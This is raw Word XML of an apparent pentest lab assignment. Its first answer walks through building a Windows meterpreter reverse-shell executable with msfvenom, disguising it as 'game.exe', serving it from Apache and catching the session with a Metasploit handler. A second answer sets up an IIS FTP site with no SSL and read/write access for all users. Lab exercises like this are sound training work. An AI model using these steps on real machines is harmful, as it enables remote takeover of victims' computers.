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12C08" w14:textId="77777777" w:rsidR="003C63B9" w:rsidRDefault="003C63B9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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="34E3FED0" w14:textId="0374AA2D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Question 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B342C9" w14:textId="5C6036DC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Create payload for windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D15EEF6" w14:textId="3026422F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step1: open terminal in kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D3A52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Step2: type command to make payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3833254B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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> --platform windows-a x86 -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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skikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -b "\x00" LHOST=192.168.43.45 -f exe&gt; /var/www/html/123/game.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA72F7B" w14:textId="77777777" w:rsidR="00A97E48" w:rsidRPr="00804F81" w:rsidRDefault="00A97E48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</w:p>
    <w:p w14:paraId="04CA5920" w14:textId="4774C3B5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Transfer the payload to the victim’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C9C38A" w14:textId="42938A10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Step1: apt install apache2 (to install apache server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F77B3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 xml:space="preserve">Step2: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> var/www/html/folder name (to make folder in html directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7FDD74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Step3: start the service of apache server (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> start apache2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5F734D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Step4: open chrome in victim’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605CA6C0" w14:textId="1C6ABD11" w:rsidR="002B1C36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 xml:space="preserve">Step5: search </w:t>
      </w:r>
      <w:r w:rsidRPr="00804F81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="0563C1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">http://ip </w:t>
      </w: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address of apache server/folder name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E3ED5F" w14:textId="77777777" w:rsidR="00654CD4" w:rsidRPr="00804F81" w:rsidRDefault="00654CD4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</w:p>
    <w:p w14:paraId="5D75FCB9" w14:textId="13F5705D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Exploit the victim’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D3168" w14:textId="2721A599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 xml:space="preserve">Step1: type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> (to start Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D215A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Step2: after that type use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC52082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Step3: type set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="417CF884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 xml:space="preserve">Step4: type set LHOST [your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> address]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7256AFE6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Step5: type exploit -j -z (to start session between victim’s and your machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3DB2D7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Step6: now start session by typing sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD46459" w14:textId="77777777" w:rsidR="00144F38" w:rsidRDefault="00144F38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89740E5" w14:textId="77777777" w:rsidR="00144F38" w:rsidRDefault="00144F38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6608881" w14:textId="2B1AA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Question 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7061A2FD" w14:textId="6D6F8C1E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Create an FTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6B3ED" w14:textId="45CE0CB1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Step1: go to tools in server manger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38217A38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Step2: select Internet Information Services (IIS) Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775A7834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Step3: select WIN server and right click it and select Add FTP Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C25621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Step4: write name in FTP site name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6F17EB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Step5: In Physical path give path c:\inetpub\ftproot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F54360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Step6: tick on no SSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CCF2DC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Step:7: In Authentication= basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788DCA25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Authorization= All users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290E0AE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Permissions= read and write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B085B23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Step8: select finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34621015" w14:textId="77777777" w:rsidR="003C63B9" w:rsidRDefault="003C63B9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</w:p>
    <w:p w14:paraId="4A9D2528" w14:textId="6F0881A2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Access FTP Server from windows command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A74866" w14:textId="3D04C29A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 xml:space="preserve">Step1: start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> win-2016 machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA5EAE2" w14:textId="77777777" w:rsidR="002B1C36" w:rsidRPr="00804F81" w:rsidRDefault="002B1C36" w:rsidP="002B1C36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Step2: open command prompt (admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410FC667" w14:textId="616307CE" w:rsidR="00233E05" w:rsidRPr="003C63B9" w:rsidRDefault="002B1C36" w:rsidP="003C63B9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theme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="x-none"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">Step3: type ftp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00804F81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> address of victim machine</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00233E05" w:rsidRPr="003C63B9" w:rsidSect="002D46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78"/>
    <w:rsid w:val="00144F38"/>
    <w:rsid w:val="001761CC"/>
    <w:rsid w:val="00233E05"/>
    <w:rsid w:val="002B0147"/>
    <w:rsid w:val="002B1C36"/>
    <w:rsid w:val="00345525"/>
    <w:rsid w:val="0036500F"/>
    <w:rsid w:val="003B1D78"/>
    <w:rsid w:val="003C63B9"/>
    <w:rsid w:val="00654CD4"/>
    <w:rsid w:val="00772413"/>
    <w:rsid w:val="007B53BB"/>
    <w:rsid w:val="00804F81"/>
    <w:rsid w:val="00A97E48"/>
    <w:rsid w:val="00BA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D9AA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DFB62950-2B0D-4432-94B5-CE7F4F1B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Negi, Hemant</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Negi, Hemant</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-02T18:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-02T18:37:00Z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c4d06e-487d-4037-8bcc-68585ad0649c_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_67c4d06e-487d-4037-8bcc-68585ad0649c_SetDate">
    <vt:lpwstr>2020-09-02T18:37:27Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_67c4d06e-487d-4037-8bcc-68585ad0649c_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_67c4d06e-487d-4037-8bcc-68585ad0649c_Name">
    <vt:lpwstr>Personal</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_67c4d06e-487d-4037-8bcc-68585ad0649c_SiteId">
    <vt:lpwstr>22d635a3-3930-4779-a82d-155e2d13b75e</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_67c4d06e-487d-4037-8bcc-68585ad0649c_ActionId">
    <vt:lpwstr>a33c3a77-b46b-44a6-af98-9a94a4be2b36</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_67c4d06e-487d-4037-8bcc-68585ad0649c_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>